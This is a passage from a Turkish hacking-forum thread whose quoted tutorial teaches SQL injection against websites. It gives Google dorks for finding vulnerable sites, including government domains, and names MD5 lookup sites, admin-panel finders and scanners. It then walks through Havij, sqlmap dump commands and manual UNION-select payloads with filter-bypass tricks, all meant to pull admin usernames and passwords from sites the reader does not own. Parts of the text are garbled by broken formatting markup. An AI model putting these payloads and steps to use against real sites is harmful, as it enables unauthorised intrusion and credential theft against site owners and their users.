SQL Açığı Kullanımı ve Türleri Tüm Yöntemler /Manuel , Havij , SQLMAP/ AquieLL

AquieLL

AquieLL

Kıdemli Üye
1 Tem 2014
4,034
16
aquu.php
Herkese Tesekkurler . Sorusu Olanlar İçin Okul Nedeniyle Bilgisayara Yazdan Beri Oturmuyorum . O Yüzden Cevap Veremiyorum Kusura Bakmayın .
 
PoleStar25

PoleStar25

Katılımcı Üye
22 Kas 2015
739
0
31
Erzurm=DADAŞ
Konuyu hortlatmış oluyorum ama işte bi olayı bulan vardır bide anlatan işte adamım sen o anlatan adamsın veteran abinin konuya baktım kafa karıştı ama sen anlatmayı biliyorsun....
 
B

byfat51

Uzman üye
8 Kas 2015
1,860
0
Nide-->Niğde
AquieLL' Alıntı:
Evet Arkadaşlar SQL Açığı ve Türleri Tüm Yöntemler Konuma Hoşgelidiniz !

---------------------------------------------------------------------
DERS 1 SQL Hakkında Kısa Bilgiler

+SQL Nedir ?
+Veri Tabanından Bilgi Çekme Silme Vb. İşlemler İçin Kullanılır
+İnternet Sitelerinde Çokca Bulunan Bir Açıktır.
+KRİTİK BİR AÇIKITR !

+SQL Açığı Nedir ?
-SQL Açığı Veritabanındaki Zafiyetlerden Oluşur.

+SQL Açıklı Siteleri Nasıl Bulurum ?
+Gerekli Dorkarı Yazarak
ÖRNEK :
Kod: 
inurl:newsDetail.php?id= 
inurl:gallery.php?id= i
nurl:article.php?id=

+SQL 'De Hedef Ülke İçin Dork Nasıl Yazılır ?
-
Kod: 
inurl:”php?id=” “gov.fr”

 +SQL Dork Yazdım Siteyi Buldum Açık Olduğunu Nasıl Anlarım ?
ÖRN:www.örneksitemiz.com/newsDetail.php?id=12
>>
id=12'
>>
id=12'nin Yanına tek tırnak (') Koyuyoruz.
Kod: 
[COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][COLOR=SeaGreen][COLOR=SandyBrown][COLOR=SeaGreen][COLOR=DarkRed][COLOR=Teal][COLOR=DarkOrange][COLOR=SandyBrown][COLOR=Orange][COLOR=SandyBrown]i[COLOR=Gray]nclude(../inc/content220\\\\\\\\\\\\\\\\’.inc.php) [function.include]:  failed to open stream: No such file or directory in  /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/SIZE][/B][/COLOR]

---------------------------------------------------------------------
DERS 2 MD5 ÇÖZME
Arkadaşlar MD5 Kırma Diye Birşey Günümüzde Bulunmamaktadır.

MD5'i Çözülenler Google Databasesinde Mevcuttur.

Bazı Siteler Çözülmüş MD5LERİ Bulmamızda Yardımcı Oluyor.

ÖRN :
Kod: 
[LIST=1]
[*][URL="http://tr.freemd5.com/"]http://tr.freemd5.com[/URL]
[*][URL="http://md5.rednoize.com/"]✅ Hash Toolkit - Reverse MD5 / SHA1 Hashes ✅[/URL]
[*][url=http://www.md5decrypter.co.uk/]HashKiller.co.uk, Over 131.235 billion decrypted hashes in total, Free Hash Cracker, Online Hash Cracker[/url]
[*][URL="http://md5cracker.org/"]md5cracker.org | The Cracking Engine for MD5-Hashes[/URL]
[*][URL="http://www.md5crack.com/"]MD5 Crack | A free online MD5 hash and password cracker and decrypter.[/URL]
[*][URL="http://www.md5this.com/"]md5 cracker - The fastest way to recover your lost passwords - Crack it[/URL]
[*][URL="http://www.cmd5.org/"]online md5 cracker,md5 decoder, md5 decrypt[/URL]
[*][URL="http://www.tobtu.com/md5.php"]MD5 Cracker - TobTu[/URL]
[*][URL="http://cracker.fox21.at/"]Cracker[/URL]
[*][URL]http://www.hash-cracker.com/[/URL]
[*][URL="http://www.md5decrypter.com/"]MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter, Security, MD5 Hash, MD5 Security.[/URL]
[*][URL="http://www.xmd5.org/"]md5,md5???,XMD5[/URL]
[*][URL="http://www.hash-database.net/"]hash-database.net[/URL]
[*][URL="http://www.md5-hash.com/"]md5-hash.com[/URL]
[/LIST]
---------------------------------------------------------------------
Ders 3 Admin Panel Bulma

1-)İntelli Tamper :
Sitenin Dosyalarını Çekip Admin Panelini Bulabilirsiniz.

2-)Havij:
Haviji İndirip Menülerden " Admin Panel Finder " Basıp Admin Panelini Bulabilirsiniz .

3-)Robots.txt ; ve Sitemap ;
Sitemap= Bulundugunuz Sitenin Haritasını Gösterir Ki Admin Panelini Bulabilirsiniz

Robots.txt= İse Eger Ki Adminin Browser'ı Google İse Robots.txt Site'deki Bi Nevi Kayıt Yapan Google
Robotudur(Script Kaydı ) Bunuda txt Belgesi Olarak sİtede Görüntüleyebilirsiniz.

+Robots.txt ve sitemap ; nasıl uygularım ?
-www.siteadresi.com/sitemap.xml&&

yada

-www.siteadresi.com/robots.tx

---------------------------------------------------------------------


 DERS 4 HEDEF SİTEDE SQL AÇIK TARAYICI PROGRAMLAR

1-)Safe 3 :
www.hedefsitemiz.com/ Şeklinde Yazıp " Scan" Butonuna Basıyoruz .

-Eğer Açık Var İse "Vulnerablinies" Bölümünde çıkacaktır.

-Açık Çıktıysa Sağ Tıklayıp " Export " Diyoruz .

- Ve Bizi Açığa Yönlendiriyor.
mzLa52.png


2-)Acunetix :

Sol Üst Köşede " New Scan " Basıyoruz.
-Karşımıza Çıkan Pencere'de Hedef Sitemizin Başına "http://www." Koyarak Yazıyoruz .
-Next ... Next Diyoruz
-VE Finish Geliyor Finish Deyip Açık Taramasını Bekliyoruz.
-Kritik Açık Olduğunu Kırmızı Renkteki Açıklar Belitiyor. İşimize Yarayan O'dur.
DRJr9y.jpg


3-)WebCruiserWWS :

-Web Cruiser Programı xss , lfi , sql , rfi açıkları tarayabilir.

-scanner deyip hedef sitemizi yazıp " scan site " dediktan sonra tarama başlar.
EqJBpD.png



---------------------------------------------------------------------
Ders 5 Havij İle Site Hackleme

+HAVİJ AÇIYORUZ TARGET YAZAN YERE SİTE ADRESİMİZİ YAZIYORUZ.

hvj1.png


+Sitemizi Yazdıktan Sonra " Analyze " Tuşuna Basıyoruz.
hvj2.png


+Bekliyoruz...
hvj3.png


+Tables Diyoruz ve Databasemizi Seçiyoruz.
hvj4.png


+Databesemizi Seçtikten Sonra " Tables >> Get Tables " Diyoruz.
hvj5.png


+Bilgilerimiz Geliyor...
hvj6.png


+Gelen Bilgilerden " USER " Seçiyoruz.
hvj7.png


+User Seçtikten Sonra >> " get columns " diyoruz.
hvj8.png


+Yeni Bilgiler Geliyor Bize Lazım Olan " ADMİN(username) VE PASSWORD " SEÇİYORUZ.
hvj9.png


+ADMİN(USERNAME) VE PASSWORD SEÇTİKTEN SONRA >> " GET DATA " DİYORUZ.
hvj10.png


+Ve İstediğimiz Bilgiler Çekiliyor .. :)
hvj11.png


---------------------------------------------------------------------
DERS 6 SQLMAP İLE SİTE HACK

Gerekli Programlar :

+SQLMAP
+Phyton 2.7

Yükledikten Sonra :

+SQLMAP'I C:// Dizisine Atın.

+İlk Olarak CMD açın ve ;
Kod: 
cd..
+Devam Ediyoruz.
Kod: 
cd..
+Bir Değişiklik Yapıyoruz.
Kod: 
cd sqlmap
+SQLMAP yoluna geldik şimdi
Kod: 
sqlmap.py -u''http://site.com/php?id=1'' --dbs
+Şimdi Bize [Y/n] Sorusu Soracak Y Deyip Devam Ediyoruz
+Tabloları Çekelim
Kod: 
sqlmap.py -u''http://site.com/php?id=1''   veritabanı ismi --tables


+Düzenlersek
Kod: 
sqlmap.py -u''http://site.com/php?id=1''  türkhack--tables
Kod: 
 sqlmap.py -u''http://site.com/php?id=1'' türkhack -T tablo_ismi --columns


+Düzenlersek
Kod: 
sqlmap.py -u''http://site.com/php?id=1'' türkhack -T admin --columns


ADMİN Kolonları İçindeki Tabloları Bulduk Varsayarsak

+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |

Bunlar geldi varsayalım..

+Şifre Bulmak İçin.
Kod: 
sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Password --dump


+Kullanıcı Adı İçin.
Kod: 
sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Username --dump

---------------------------------------------------------------------
Ders 7 Manuel SQL Hack


Saldırı Aşamaları :
İki Türlü Saldırı Yapılabilir Havij ve Manuel .
İlk Olarak Manuel İle Saldıralım.

1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)

Ve Saldırıyoruz ...

1-)Kolon Sayısını Öğrenme :

Site:örneksitemiz.com/index.php?id=30

Arkadaşlar Sitemizin Sonuna (order+by+sayı- ) ( - işaretini getirmeyi unutmayalım)

Kod: 
>> örneksitemiz.com/index.php?id=30+order+by+29-

Eğer Şöyle Bir Hata Gelirse :

Hata: Unknown column ’10’ in ’order clause Benzer Bir Hata Çıkarsa ;

>> Kolon Sayısı 29'dan Küçük Tek Tek Aşağı İniyoruz .

>>order+by+28- , order+by+27-, order+by+26 , Site Eski Haline Gelesiye Kadar İniyoruz .

>> order+by+25- ( Sayfa Burda Eski Haline Gelmiş İse KOLON SAYIMIZ 25'Dir . )

2-)Kolonları Yansıtma

Arkadaşlar Burda +union+select+kolon Teker Teker Yazıyoruz. (- Sitenin Sonuna Yine Eklenecektir.)

>>
Kod: 
[URL="http://www.%C3%B6rneksitemiz.com/index.php?id=30"]www.örneksitemiz.com/index.php?id=30[/URL]      URL Sonuna


>>
Kod: 
www.örneksitemiz.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-


Şeklinde Olucak Kolon Sayımız Kaçsa Oraya Kadar Yazacağız.

>>
Şimdi Ekranı Sayılar Yansıyacak 10 ve 13 Yansıdı Diyelim. Bu Sayılardan Birini Seçip İşlemimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.

>>Bypass
Kod: 
1) Normal: +union +select+1,2,3,4,5,6,7,25–
 
    Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25–
 
2) Normal:+union +select+1,2,3,4,5,6,7,25–
 
    Bypass: +union +(select+1,2,3,4,5,6,7,25–)
 
3) Normal:+union +select+1,2,3,4,5,6,7,25–
 
    Bypass: +#union# +#select#+1,2,3,4,5,6,7,25–

3-)Tablo İsimlerini Çekmek

-Yansıyan Sayıları ( 10 ve 13) Birini Seçiyoruz .
-10 Seçelim.
Kod: 
A-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,database(),3,4,5,  6,7,8,..,24,25-

Bu Komut Sayesinde Sitenin VeriTabanı İsmini Öğreniyoruz.
Kod: 
B-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,version(),3,4,5,6  ,7,8,..,24,25-

Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
Kod: 
C-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_contact(tab    le_name),4,5,6,7,8,...,24,25+from+information_schema.tables-
 [COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][SIZE=3][COLOR=white][SIZE=3][COLOR=white]
 [SIZE=2][COLOR=SandyBrown][B]– information_schema.tables = veritabanındaki tablo isimlerini gösterir
 
>>schema.tables yerini daha sonra şu komutu yazıyoruz.
 
 [/B][B]– information_schema.columns = veritabanındaki kolon isimlerini gösterir
 
 [CODE]-)[URL="http://www.%C3%B6rneksitemiz/index.php?id=30+union+select"]www.örneksitemiz/index.php?id=30+union+select[/URL]+1,2,group_concat(table_name),4,5,...,24,25+from+i  nformation_schema.tables+where+tables_schema=database()–
[/B][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/B][/COLOR]
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.

– Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız

– Bizim burada ilgileneceğimiz tablo ismi admin ’dir.

4-)Tablo İsimlerinden Veriyi Almak

-Adminin Verilerini Alacağız.
Kod: 
www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr  om+information_schema.CoLumns+where+TabLeS_schema=  database()+and+TabLe_Name=admin


Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar

ÖRN : user
passaword
e-mail
phone number

Bize Lazım Olanlar " User ve Passaword "

>>
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım

>>
Kod: 
www.örneksite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin–

Kodunu Yazıp Sayfayı Yeniliyoruz.

>>
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.

>>
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir)

Genişletmek için tıkla ...

Tesekkürler
 
C

Coosy

Yeni üye
2 Ocak 2016
23
0
Acikcasi ben herhangi bir hack icin disardan ozellikle internetten birsey indirmeyi uygun gormuyorum bununla alakali programlarin calisma prensiplerini anlatiminin oldugu bir konu varsa yonlendirebilir misiniz eger yoksa ufak bi yardim olarak istiyorum bunu
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.